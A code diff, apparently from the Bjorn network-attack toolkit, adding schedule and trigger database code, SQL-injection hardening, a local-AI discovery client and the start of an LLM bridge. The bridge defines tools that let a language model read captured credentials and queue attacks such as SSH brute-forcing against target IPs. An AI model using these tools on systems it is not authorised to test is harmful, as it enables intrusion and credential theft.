Normal file
@@ -0,0 +1,244 @@
|
||||
"""schedules.py - Script scheduling and trigger operations."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from datetime import datetime, timedelta
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="db_utils.schedules", level=logging.DEBUG)
|
||||
|
||||
|
||||
class ScheduleOps:
|
||||
"""Script schedule and trigger management operations"""
|
||||
|
||||
def __init__(self, base):
|
||||
self.base = base
|
||||
|
||||
def create_tables(self):
|
||||
"""Create script_schedules and script_triggers tables"""
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS script_schedules (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
script_name TEXT NOT NULL,
|
||||
schedule_type TEXT NOT NULL DEFAULT 'recurring',
|
||||
interval_seconds INTEGER,
|
||||
run_at TEXT,
|
||||
args TEXT DEFAULT '',
|
||||
conditions TEXT,
|
||||
enabled INTEGER DEFAULT 1,
|
||||
last_run_at TEXT,
|
||||
next_run_at TEXT,
|
||||
run_count INTEGER DEFAULT 0,
|
||||
last_status TEXT,
|
||||
last_error TEXT,
|
||||
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
|
||||
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
|
||||
);
|
||||
""")
|
||||
self.base.execute("""
|
||||
CREATE INDEX IF NOT EXISTS idx_sched_next
|
||||
ON script_schedules(next_run_at) WHERE enabled=1;
|
||||
""")
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS script_triggers (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
script_name TEXT NOT NULL,
|
||||
trigger_name TEXT NOT NULL,
|
||||
conditions TEXT NOT NULL,
|
||||
args TEXT DEFAULT '',
|
||||
enabled INTEGER DEFAULT 1,
|
||||
last_fired_at TEXT,
|
||||
fire_count INTEGER DEFAULT 0,
|
||||
cooldown_seconds INTEGER DEFAULT 60,
|
||||
created_at TEXT DEFAULT CURRENT_TIMESTAMP
|
||||
);
|
||||
""")
|
||||
self.base.execute("""
|
||||
CREATE INDEX IF NOT EXISTS idx_trig_enabled
|
||||
ON script_triggers(enabled) WHERE enabled=1;
|
||||
""")
|
||||
logger.debug("Schedule and trigger tables created/verified")
|
||||
|
||||
# =========================================================================
|
||||
# SCHEDULE OPERATIONS
|
||||
# =========================================================================
|
||||
|
||||
def add_schedule(self, script_name: str, schedule_type: str,
|
||||
interval_seconds: Optional[int] = None,
|
||||
run_at: Optional[str] = None, args: str = '',
|
||||
conditions: Optional[str] = None) -> int:
|
||||
"""Insert a new schedule entry and return its id"""
|
||||
next_run_at = None
|
||||
if schedule_type == 'recurring' and interval_seconds:
|
||||
next_run_at = (datetime.utcnow() + timedelta(seconds=interval_seconds)).strftime('%Y-%m-%d %H:%M:%S')
|
||||
elif run_at:
|
||||
next_run_at = run_at
|
||||
|
||||
self.base.execute("""
|
||||
INSERT INTO script_schedules
|
||||
(script_name, schedule_type, interval_seconds, run_at, args, conditions, next_run_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?);
|
||||
""", (script_name, schedule_type, interval_seconds, run_at, args, conditions, next_run_at))
|
||||
|
||||
rows = self.base.query("SELECT last_insert_rowid() AS id;")
|
||||
return rows[0]['id'] if rows else 0
|
||||
|
||||
def update_schedule(self, id: int, **kwargs) -> None:
|
||||
"""Update schedule fields; recompute next_run_at if interval changes"""
|
||||
if not kwargs:
|
||||
return
|
||||
sets = []
|
||||
params = []
|
||||
for key, value in kwargs.items():
|
||||
sets.append(f"{key}=?")
|
||||
params.append(value)
|
||||
sets.append("updated_at=datetime('now')")
|
||||
params.append(id)
|
||||
self.base.execute(
|
||||
f"UPDATE script_schedules SET {', '.join(sets)} WHERE id=?;",
|
||||
tuple(params)
|
||||
)
|
||||
# Recompute next_run_at if interval changed
|
||||
if 'interval_seconds' in kwargs:
|
||||
row = self.get_schedule(id)
|
||||
if row and row['schedule_type'] == 'recurring' and kwargs['interval_seconds']:
|
||||
next_run = (datetime.utcnow() + timedelta(seconds=kwargs['interval_seconds'])).strftime('%Y-%m-%d %H:%M:%S')
|
||||
self.base.execute(
|
||||
"UPDATE script_schedules SET next_run_at=?, updated_at=datetime('now') WHERE id=?;",
|
||||
(next_run, id)
|
||||
)
|
||||
|
||||
def delete_schedule(self, id: int) -> None:
|
||||
"""Delete a schedule by id"""
|
||||
self.base.execute("DELETE FROM script_schedules WHERE id=?;", (id,))
|
||||
|
||||
def list_schedules(self, enabled_only: bool = False) -> List[Dict[str, Any]]:
|
||||
"""List all schedules, optionally filtered to enabled only"""
|
||||
if enabled_only:
|
||||
return self.base.query(
|
||||
"SELECT * FROM script_schedules WHERE enabled=1 ORDER BY id;"
|
||||
)
|
||||
return self.base.query("SELECT * FROM script_schedules ORDER BY id;")
|
||||
|
||||
def get_schedule(self, id: int) -> Optional[Dict[str, Any]]:
|
||||
"""Get a single schedule by id"""
|
||||
return self.base.query_one(
|
||||
"SELECT * FROM script_schedules WHERE id=?;", (id,)
|
||||
)
|
||||
|
||||
def get_due_schedules(self) -> List[Dict[str, Any]]:
|
||||
"""Get schedules that are due to run"""
|
||||
return self.base.query("""
|
||||
SELECT * FROM script_schedules
|
||||
WHERE enabled=1
|
||||
AND next_run_at <= datetime('now')
|
||||
AND (last_status IS NULL OR last_status != 'running')
|
||||
ORDER BY next_run_at;
|
||||
""")
|
||||
|
||||
def mark_schedule_run(self, id: int, status: str, error: Optional[str] = None) -> None:
|
||||
"""Mark a schedule as run, update counters, recompute next_run_at"""
|
||||
row = self.get_schedule(id)
|
||||
if not row:
|
||||
return
|
||||
|
||||
now = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
|
||||
|
||||
if row['schedule_type'] == 'recurring' and row['interval_seconds']:
|
||||
next_run = (datetime.utcnow() + timedelta(seconds=row['interval_seconds'])).strftime('%Y-%m-%d %H:%M:%S')
|
||||
self.base.execute("""
|
||||
UPDATE script_schedules
|
||||
SET last_run_at=?, last_status=?, last_error=?,
|
||||
run_count=run_count+1, next_run_at=?, updated_at=datetime('now')
|
||||
WHERE id=?;
|
||||
""", (now, status, error, next_run, id))
|
||||
else:
|
||||
# oneshot: disable after run
|
||||
self.base.execute("""
|
||||
UPDATE script_schedules
|
||||
SET last_run_at=?, last_status=?, last_error=?,
|
||||
run_count=run_count+1, enabled=0, updated_at=datetime('now')
|
||||
WHERE id=?;
|
||||
""", (now, status, error, id))
|
||||
|
||||
def toggle_schedule(self, id: int, enabled: bool) -> None:
|
||||
"""Enable or disable a schedule"""
|
||||
self.base.execute(
|
||||
"UPDATE script_schedules SET enabled=?, updated_at=datetime('now') WHERE id=?;",
|
||||
(1 if enabled else 0, id)
|
||||
)
|
||||
|
||||
# =========================================================================
|
||||
# TRIGGER OPERATIONS
|
||||
# =========================================================================
|
||||
|
||||
def add_trigger(self, script_name: str, trigger_name: str, conditions: str,
|
||||
args: str = '', cooldown_seconds: int = 60) -> int:
|
||||
"""Insert a new trigger and return its id"""
|
||||
self.base.execute("""
|
||||
INSERT INTO script_triggers
|
||||
(script_name, trigger_name, conditions, args, cooldown_seconds)
|
||||
VALUES (?, ?, ?, ?, ?);
|
||||
""", (script_name, trigger_name, conditions, args, cooldown_seconds))
|
||||
|
||||
rows = self.base.query("SELECT last_insert_rowid() AS id;")
|
||||
return rows[0]['id'] if rows else 0
|
||||
|
||||
def update_trigger(self, id: int, **kwargs) -> None:
|
||||
"""Update trigger fields"""
|
||||
if not kwargs:
|
||||
return
|
||||
sets = []
|
||||
params = []
|
||||
for key, value in kwargs.items():
|
||||
sets.append(f"{key}=?")
|
||||
params.append(value)
|
||||
params.append(id)
|
||||
self.base.execute(
|
||||
f"UPDATE script_triggers SET {', '.join(sets)} WHERE id=?;",
|
||||
tuple(params)
|
||||
)
|
||||
|
||||
def delete_trigger(self, id: int) -> None:
|
||||
"""Delete a trigger by id"""
|
||||
self.base.execute("DELETE FROM script_triggers WHERE id=?;", (id,))
|
||||
|
||||
def list_triggers(self, enabled_only: bool = False) -> List[Dict[str, Any]]:
|
||||
"""List all triggers, optionally filtered to enabled only"""
|
||||
if enabled_only:
|
||||
return self.base.query(
|
||||
"SELECT * FROM script_triggers WHERE enabled=1 ORDER BY id;"
|
||||
)
|
||||
return self.base.query("SELECT * FROM script_triggers ORDER BY id;")
|
||||
|
||||
def get_trigger(self, id: int) -> Optional[Dict[str, Any]]:
|
||||
"""Get a single trigger by id"""
|
||||
return self.base.query_one(
|
||||
"SELECT * FROM script_triggers WHERE id=?;", (id,)
|
||||
)
|
||||
|
||||
def get_active_triggers(self) -> List[Dict[str, Any]]:
|
||||
"""Get all enabled triggers"""
|
||||
return self.base.query(
|
||||
"SELECT * FROM script_triggers WHERE enabled=1 ORDER BY id;"
|
||||
)
|
||||
|
||||
def mark_trigger_fired(self, id: int) -> None:
|
||||
"""Record that a trigger has fired"""
|
||||
self.base.execute("""
|
||||
UPDATE script_triggers
|
||||
SET last_fired_at=datetime('now'), fire_count=fire_count+1
|
||||
WHERE id=?;
|
||||
""", (id,))
|
||||
|
||||
def is_trigger_on_cooldown(self, id: int) -> bool:
|
||||
"""Check if a trigger is still within its cooldown period"""
|
||||
row = self.base.query_one("""
|
||||
SELECT 1 AS on_cooldown FROM script_triggers
|
||||
WHERE id=?
|
||||
AND last_fired_at IS NOT NULL
|
||||
AND datetime(last_fired_at, '+' || cooldown_seconds || ' seconds') > datetime('now');
|
||||
""", (id,))
|
||||
return row is not None
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/scripts.py
|
||||
# Script and project metadata operations
|
||||
"""scripts.py - Script and project metadata operations."""
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
import logging
|
||||
|
||||
@@ -1,11 +1,10 @@
|
||||
"""
|
||||
Sentinel DB operations — events, rules, known devices baseline.
|
||||
"""
|
||||
"""sentinel.py - Events, rules, and known devices baseline."""
|
||||
import json
|
||||
import logging
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
from logger import Logger
|
||||
from db_utils.base import _validate_identifier
|
||||
|
||||
logger = Logger(name="db_utils.sentinel", level=logging.DEBUG)
|
||||
|
||||
@@ -17,7 +16,7 @@ class SentinelOps:
|
||||
def create_tables(self):
|
||||
"""Create all Sentinel tables."""
|
||||
|
||||
# Known device baselines — MAC → expected behavior
|
||||
# Known device baselines - MAC → expected behavior
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS sentinel_devices (
|
||||
mac_address TEXT PRIMARY KEY,
|
||||
@@ -261,9 +260,11 @@ class SentinelOps:
|
||||
if existing:
|
||||
sets = []
|
||||
params = []
|
||||
_ALLOWED_DEVICE_COLS = {"alias", "trusted", "watch", "expected_ips",
|
||||
"expected_ports", "notes"}
|
||||
for k, v in kwargs.items():
|
||||
if k in ("alias", "trusted", "watch", "expected_ips",
|
||||
"expected_ports", "notes"):
|
||||
if k in _ALLOWED_DEVICE_COLS:
|
||||
_validate_identifier(k, "column name")
|
||||
sets.append(f"{k} = ?")
|
||||
params.append(v)
|
||||
sets.append("last_seen = CURRENT_TIMESTAMP")
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/services.py
|
||||
# Per-port service fingerprinting and tracking operations
|
||||
"""services.py - Per-port service fingerprinting and tracking."""
|
||||
|
||||
from typing import Dict, List, Optional
|
||||
import logging
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/software.py
|
||||
# Detected software (CPE) inventory operations
|
||||
"""software.py - Detected software (CPE) inventory operations."""
|
||||
|
||||
from typing import List, Optional
|
||||
import logging
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/stats.py
|
||||
# Statistics tracking and display operations
|
||||
"""stats.py - Statistics tracking and display operations."""
|
||||
|
||||
import time
|
||||
import sqlite3
|
||||
|
||||
@@ -1,11 +1,12 @@
|
||||
# db_utils/studio.py
|
||||
# Actions Studio visual editor operations
|
||||
"""studio.py - Actions Studio visual editor operations."""
|
||||
|
||||
import json
|
||||
import re
|
||||
from typing import Dict, List, Optional
|
||||
import logging
|
||||
|
||||
from logger import Logger
|
||||
from db_utils.base import _validate_identifier
|
||||
|
||||
logger = Logger(name="db_utils.studio", level=logging.DEBUG)
|
||||
|
||||
@@ -105,13 +106,27 @@ class StudioOps:
|
||||
ORDER BY b_priority DESC, b_class
|
||||
""")
|
||||
|
||||
# Whitelist of columns that can be updated via the studio API
|
||||
_STUDIO_UPDATABLE = frozenset({
|
||||
'b_priority', 'studio_x', 'studio_y', 'studio_locked', 'studio_color',
|
||||
'studio_metadata', 'b_trigger', 'b_requires', 'b_enabled', 'b_timeout',
|
||||
'b_max_retries', 'b_cooldown', 'b_rate_limit', 'b_service', 'b_port',
|
||||
'b_stealth_level', 'b_risk_level', 'b_tags', 'b_parent', 'b_action',
|
||||
})
|
||||
|
||||
def update_studio_action(self, b_class: str, updates: dict):
|
||||
"""Update a studio action"""
|
||||
sets = []
|
||||
params = []
|
||||
for key, value in updates.items():
|
||||
_validate_identifier(key, "column name")
|
||||
if key not in self._STUDIO_UPDATABLE:
|
||||
logger.warning(f"Ignoring unknown studio column: {key}")
|
||||
continue
|
||||
sets.append(f"{key} = ?")
|
||||
params.append(value)
|
||||
if not sets:
|
||||
return
|
||||
params.append(b_class)
|
||||
|
||||
self.base.execute(f"""
|
||||
@@ -313,7 +328,9 @@ class StudioOps:
|
||||
if col == "b_class":
|
||||
continue
|
||||
if col not in stu_cols:
|
||||
_validate_identifier(col, "column name")
|
||||
col_type = act_col_defs.get(col, "TEXT") or "TEXT"
|
||||
_validate_identifier(col_type.split()[0], "column type")
|
||||
self.base.execute(f"ALTER TABLE actions_studio ADD COLUMN {col} {col_type};")
|
||||
|
||||
# 3) Insert missing b_class entries, non-destructive
|
||||
@@ -326,6 +343,7 @@ class StudioOps:
|
||||
for col in act_cols:
|
||||
if col == "b_class":
|
||||
continue
|
||||
_validate_identifier(col, "column name")
|
||||
# Only update if the studio value is NULL
|
||||
self.base.execute(f"""
|
||||
UPDATE actions_studio
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/vulnerabilities.py
|
||||
# Vulnerability tracking and CVE metadata operations
|
||||
"""vulnerabilities.py - Vulnerability tracking and CVE metadata operations."""
|
||||
|
||||
import json
|
||||
import time
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/webenum.py
|
||||
# Web enumeration (directory/file discovery) operations
|
||||
"""webenum.py - Web enumeration and directory/file discovery operations."""
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
import logging
|
||||
|
||||
@@ -1,3 +1,4 @@
|
||||
"""debug_schema.py - Dump RL table schemas to schema_debug.txt for quick inspection."""
|
||||
|
||||
import sqlite3
|
||||
import os
|
||||
|
||||
@@ -1,7 +1,4 @@
|
||||
# display.py
|
||||
# Core component for managing the E-Paper Display (EPD) and Web Interface Screenshot
|
||||
# OPTIMIZED FOR PI ZERO 2: Asynchronous Rendering, Text Caching, and I/O Throttling.
|
||||
# FULL VERSION - NO LOGIC REMOVED
|
||||
"""display.py - E-paper display renderer and web screenshot generator."""
|
||||
|
||||
import math
|
||||
import threading
|
||||
@@ -704,7 +701,7 @@ class Display:
|
||||
break
|
||||
|
||||
def _draw_system_histogram(self, image: Image.Image, draw: ImageDraw.Draw):
|
||||
# Vertical bars at the bottom-left — positions from layout
|
||||
# Vertical bars at the bottom-left - positions from layout
|
||||
mem_hist = self.layout.get('mem_histogram')
|
||||
cpu_hist = self.layout.get('cpu_histogram')
|
||||
|
||||
@@ -1026,7 +1023,7 @@ class Display:
|
||||
self._comment_layout_cache["key"] != key or
|
||||
(now - self._comment_layout_cache["ts"]) >= self._comment_layout_min_interval
|
||||
):
|
||||
# J'ai aussi augmenté la largeur disponible (width - 2) puisque l'on se colle au bord
|
||||
# Use (width - 2) since text hugs the edge
|
||||
lines = self.shared_data.wrap_text(
|
||||
self.shared_data.bjorn_says,
|
||||
self.shared_data.font_arialbold,
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
"""
|
||||
Display Layout Engine for multi-size EPD support.
|
||||
Provides data-driven layout definitions per display model.
|
||||
"""
|
||||
"""display_layout.py - Data-driven layout definitions for multi-size e-paper displays."""
|
||||
|
||||
import json
|
||||
import os
|
||||
import logging
|
||||
|
||||
@@ -1,11 +1,4 @@
|
||||
"""
|
||||
EPD Manager - singleton wrapper around Waveshare drivers.
|
||||
Hardened for runtime stability:
|
||||
- no per-operation worker-thread timeouts (prevents leaked stuck SPI threads)
|
||||
- serialized SPI access
|
||||
- bounded retry + recovery
|
||||
- health metrics for monitoring
|
||||
"""
|
||||
"""epd_manager.py - Singleton wrapper around Waveshare EPD drivers with serialized SPI access."""
|
||||
|
||||
import importlib
|
||||
import threading
|
||||
|
||||
@@ -1,22 +1,4 @@
|
||||
"""
|
||||
feature_logger.py - Dynamic Feature Logging Engine for Bjorn
|
||||
═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
Purpose:
|
||||
Automatically capture ALL relevant features from action executions
|
||||
for deep learning model training. No manual feature declaration needed.
|
||||
|
||||
Architecture:
|
||||
- Automatic feature extraction from all data sources
|
||||
- Time-series aggregation
|
||||
- Network topology features
|
||||
- Action success patterns
|
||||
- Lightweight storage optimized for Pi Zero
|
||||
- Export format ready for deep learning
|
||||
|
||||
Author: Bjorn Team (Enhanced AI Version)
|
||||
Version: 2.0.0
|
||||
"""
|
||||
"""feature_logger.py - Auto-capture action execution features for deep learning training."""
|
||||
|
||||
import json
|
||||
import time
|
||||
@@ -220,7 +202,8 @@ class FeatureLogger:
|
||||
'success': success,
|
||||
'timestamp': time.time()
|
||||
})
|
||||
self._prune_host_history()
|
||||
if len(self.host_history) > 1000:
|
||||
self._prune_host_history()
|
||||
|
||||
logger.debug(
|
||||
f"Logged features for {action_name} on {mac_address} "
|
||||
|
||||
@@ -1,13 +1,8 @@
|
||||
#init_shared.py
|
||||
# Description:
|
||||
# This file, init_shared.py, is responsible for initializing and providing access to shared data across different modules in the Bjorn project.
|
||||
#
|
||||
# Key functionalities include:
|
||||
# - Importing the `SharedData` class from the `shared` module.
|
||||
# - Creating an instance of `SharedData` named `shared_data` that holds common configuration, paths, and other resources.
|
||||
# - Ensuring that all modules importing `shared_data` will have access to the same instance, promoting consistency and ease of data management throughout the project.
|
||||
|
||||
"""init_shared.py - Global singleton for shared state; import shared_data from here."""
|
||||
|
||||
from shared import SharedData
|
||||
|
||||
# Module-level initialization is thread-safe in CPython: the import lock
|
||||
# guarantees that this module body executes at most once, even when multiple
|
||||
# threads import it concurrently (see importlib._bootstrap._ModuleLock).
|
||||
shared_data = SharedData()
|
||||
|
||||
158
land_protocol.py
Normal file
158
land_protocol.py
Normal file
@@ -0,0 +1,158 @@
|
||||
"""land_protocol.py - LAND protocol client: mDNS discovery + HTTP inference for local AI nodes."""
|
||||
|
||||
import json
|
||||
import threading
|
||||
import time
|
||||
import urllib.request
|
||||
import urllib.error
|
||||
from typing import Optional, Callable
|
||||
|
||||
# mDNS service type broadcast by all LAND-compatible nodes (LaRuche, etc.)
|
||||
LAND_SERVICE_TYPE = "_ai-inference._tcp.local."
|
||||
|
||||
# Default inference port
|
||||
LAND_DEFAULT_PORT = 8419
|
||||
|
||||
|
||||
def discover_node(
|
||||
on_found: Callable[[str], None],
|
||||
stop_event: threading.Event,
|
||||
logger=None,
|
||||
) -> None:
|
||||
"""
|
||||
Background mDNS listener for LAND nodes.
|
||||
|
||||
Calls on_found(url) whenever a new node is discovered.
|
||||
Runs until stop_event is set.
|
||||
|
||||
Requires: pip install zeroconf
|
||||
"""
|
||||
try:
|
||||
from zeroconf import Zeroconf, ServiceBrowser, ServiceListener
|
||||
except ImportError:
|
||||
if logger:
|
||||
logger.warning(
|
||||
"zeroconf not installed - LAND mDNS discovery disabled. "
|
||||
"Run: pip install zeroconf"
|
||||
)
|
||||
else:
|
||||
print("[LAND] zeroconf not installed - mDNS discovery disabled")
|
||||
return
|
||||
|
||||
class _Listener(ServiceListener):
|
||||
def add_service(self, zc: Zeroconf, type_: str, name: str) -> None: # type: ignore[override]
|
||||
info = zc.get_service_info(type_, name)
|
||||
if not info:
|
||||
return
|
||||
addresses = info.parsed_scoped_addresses()
|
||||
if not addresses:
|
||||
return
|
||||
port = info.port or LAND_DEFAULT_PORT
|
||||
url = f"http://{addresses[0]}:{port}"
|
||||
on_found(url)
|
||||
|
||||
def remove_service(self, zc: Zeroconf, type_: str, name: str) -> None: # type: ignore[override]
|
||||
pass
|
||||
|
||||
def update_service(self, zc: Zeroconf, type_: str, name: str) -> None: # type: ignore[override]
|
||||
self.add_service(zc, type_, name)
|
||||
|
||||
zc = Zeroconf()
|
||||
try:
|
||||
ServiceBrowser(zc, LAND_SERVICE_TYPE, _Listener())
|
||||
if logger:
|
||||
logger.info(f"LAND: mDNS discovery active ({LAND_SERVICE_TYPE})")
|
||||
while not stop_event.is_set():
|
||||
time.sleep(5)
|
||||
finally:
|
||||
zc.close()
|
||||
|
||||
|
||||
def infer(
|
||||
base_url: str,
|
||||
prompt: str,
|
||||
max_tokens: int = 500,
|
||||
capability: str = "llm",
|
||||
model: Optional[str] = None,
|
||||
timeout: int = 30,
|
||||
) -> Optional[str]:
|
||||
"""
|
||||
Send an inference request to a LAND node.
|
||||
|
||||
POST {base_url}/infer
|
||||
Body: {"prompt": str, "capability": str, "max_tokens": int, "model": str|null}
|
||||
|
||||
If model is None, the node uses its default model.
|
||||
Returns the response text, or None on failure.
|
||||
"""
|
||||
payload = {
|
||||
"prompt": prompt,
|
||||
"capability": capability,
|
||||
"max_tokens": max_tokens,
|
||||
}
|
||||
if model:
|
||||
payload["model"] = model
|
||||
data = json.dumps(payload).encode()
|
||||
req = urllib.request.Request(
|
||||
f"{base_url.rstrip('/')}/infer",
|
||||
data=data,
|
||||
headers={"Content-Type": "application/json"},
|
||||
method="POST",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
body = json.loads(resp.read().decode())
|
||||
# LAND response may use "response" or "text" key
|
||||
return body.get("response") or body.get("text") or None
|
||||
|
||||
|
||||
def get_default_model(base_url: str, timeout: int = 10) -> Optional[str]:
|
||||
"""
|
||||
Get the current default model from a LAND node.
|
||||
|
||||
GET {base_url}/config/default_model
|
||||
Returns the model name string, or None on failure.
|
||||
"""
|
||||
try:
|
||||
req = urllib.request.Request(
|
||||
f"{base_url.rstrip('/')}/config/default_model",
|
||||
headers={"Accept": "application/json"},
|
||||
method="GET",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
body = json.loads(resp.read().decode())
|
||||
return body.get("default_model") or None
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
|
||||
def list_models(base_url: str, timeout: int = 10) -> dict:
|
||||
"""
|
||||
List available models on a LAND node.
|
||||
|
||||
GET {base_url}/models
|
||||
Returns a dict with:
|
||||
- "models": list of model dicts
|
||||
- "default_model": str or None (the node's current default model)
|
||||
|
||||
Example: {"models": [{"name": "mistral:latest", ...}], "default_model": "mistral:latest"}
|
||||
Returns {"models": [], "default_model": None} on failure.
|
||||
"""
|
||||
try:
|
||||
req = urllib.request.Request(
|
||||
f"{base_url.rstrip('/')}/models",
|
||||
headers={"Accept": "application/json"},
|
||||
method="GET",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
body = json.loads(resp.read().decode())
|
||||
# LaRuche returns {"models": [...], "default_model": "..."} or a flat list
|
||||
if isinstance(body, list):
|
||||
return {"models": body, "default_model": None}
|
||||
if isinstance(body, dict):
|
||||
return {
|
||||
"models": body.get("models", []),
|
||||
"default_model": body.get("default_model") or None,
|
||||
}
|
||||
return {"models": [], "default_model": None}
|
||||
except Exception:
|
||||
return {"models": [], "default_model": None}
|
||||
661
llm_bridge.py
Normal file
661
llm_bridge.py
Normal file
@@ -0,0 +1,661 @@
|
||||
"""llm_bridge.py - LLM backend cascade: LAND/LaRuche -> Ollama -> external API -> fallback."""
|
||||
|
||||
import json
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
import urllib.request
|
||||
import urllib.error
|
||||
from typing import Optional, List, Dict, Any
|
||||
|
||||
from logger import Logger
|
||||
import land_protocol
|
||||
|
||||
logger = Logger(name="llm_bridge.py", level=20) # INFO
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tool definitions (Anthropic Messages API format).
|
||||
# Mirrors the tools exposed by mcp_server.py - add new tools here too.
|
||||
# ---------------------------------------------------------------------------
|
||||
_BJORN_TOOLS: List[Dict] = [
|
||||
{
|
||||
"name": "get_hosts",
|
||||
"description": "Return all network hosts discovered by Bjorn's scanner.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"alive_only": {"type": "boolean", "description": "Only return alive hosts. Default: true."},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "get_vulnerabilities",
|
||||
"description": "Return discovered vulnerabilities, optionally filtered by host IP.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"host_ip": {"type": "string", "description": "Filter by IP address. Empty = all hosts."},
|
||||
"limit": {"type": "integer", "description": "Max results. Default: 100."},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "get_credentials",
|
||||
"description": "Return captured credentials, optionally filtered by service name.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"service": {"type": "string", "description": "Service filter (ssh, ftp, smb…). Empty = all."},
|
||||
"limit": {"type": "integer", "description": "Max results. Default: 100."},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "get_action_history",
|
||||
"description": "Return the history of executed Bjorn actions, most recent first.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"limit": {"type": "integer", "description": "Max results. Default: 50."},
|
||||
"action_name": {"type": "string", "description": "Filter by action name. Empty = all."},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "get_status",
|
||||
"description": "Return Bjorn's current operational status, scan counters, and active action.",
|
||||
"input_schema": {"type": "object", "properties": {}},
|
||||
},
|
||||
{
|
||||
"name": "run_action",
|
||||
"description": "Queue a Bjorn action (e.g. port_scan, ssh_bruteforce) against a target IP address.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"action_name": {"type": "string", "description": "Action module name (e.g. port_scan)."},
|
||||
"target_ip": {"type": "string", "description": "Target IP address."},
|
||||
"target_mac": {"type": "string", "description": "Target MAC address (optional)."},
|
||||
},
|
||||
"required": ["action_name", "target_ip"],
|
||||
},
|
||||
},
|
||||
{
|
||||
"name": "query_db",
|
||||
"description": "Run a read-only SELECT query against Bjorn's SQLite database.",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"sql": {"type": "string", "description": "SELECT SQL statement."},
|
||||
"params": {"type": "array", "items": {"type": "string"}, "description": "Bind parameters."},
|
||||
},
|
||||
"required": ["sql"],
|
||||
},
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
class LLMBridge:
|
||||
"""
|
||||
Unified LLM backend with automatic cascade:
|
||||
1. LaRuche node discovered via LAND protocol (mDNS _ai-inference._tcp.local.)
|
||||
2. Ollama running locally (http://localhost:11434)
|
||||
3. External API (Anthropic / OpenAI / OpenRouter)
|
||||
4. None → caller falls back to templates
|
||||
|
||||
Singleton - one instance per process, thread-safe.
|
||||
"""
|
||||
|
||||
_instance: Optional["LLMBridge"] = None
|
||||
_init_lock = threading.Lock()
|
||||
|
||||
def __new__(cls) -> "LLMBridge":
|
||||
with cls._init_lock:
|
||||
if cls._instance is None:
|
||||
inst = super().__new__(cls)
|
||||
inst._ready = False
|
||||
cls._instance = inst
|
||||
return cls._instance
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Init
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def __init__(self) -> None:
|
||||
if self._ready:
|
||||
return
|
||||
with self._init_lock:
|
||||
if self._ready:
|
||||
return
|
||||
from init_shared import shared_data
|
||||
self._sd = shared_data
|
||||
self._laruche_url: Optional[str] = None
|
||||
self._laruche_lock = threading.Lock()
|
||||
self._discovery_active = False
|
||||
self._chat_histories: Dict[str, List[Dict]] = {} # session_id → messages
|
||||
self._hist_lock = threading.Lock()
|
||||
self._ready = True
|
||||
|
||||
# Always start mDNS discovery - even if LLM is disabled.
|
||||
# This way LaRuche URL is ready the moment the user enables LLM.
|
||||
if self._cfg("llm_laruche_discovery", True):
|
||||
self._start_laruche_discovery()
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Config helpers
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _cfg(self, key: str, default=None):
|
||||
return self._sd.config.get(key, getattr(self._sd, key, default))
|
||||
|
||||
def _is_enabled(self) -> bool:
|
||||
return bool(self._cfg("llm_enabled", False))
|
||||
|
||||
def _lang_instruction(self) -> str:
|
||||
"""Return a prompt sentence that forces the LLM to reply in the configured language."""
|
||||
_LANG_NAMES = {
|
||||
"en": "English", "fr": "French", "es": "Spanish", "de": "German",
|
||||
"it": "Italian", "pt": "Portuguese", "nl": "Dutch", "ru": "Russian",
|
||||
"zh": "Chinese", "ja": "Japanese", "ko": "Korean", "ar": "Arabic",
|
||||
"pl": "Polish", "sv": "Swedish", "no": "Norwegian", "da": "Danish",
|
||||
"fi": "Finnish", "cs": "Czech", "tr": "Turkish",
|
||||
}
|
||||
code = self._cfg("lang", "en")
|
||||
name = _LANG_NAMES.get(code, code)
|
||||
if code == "en":
|
||||
return "" # No extra instruction needed for English (default)
|
||||
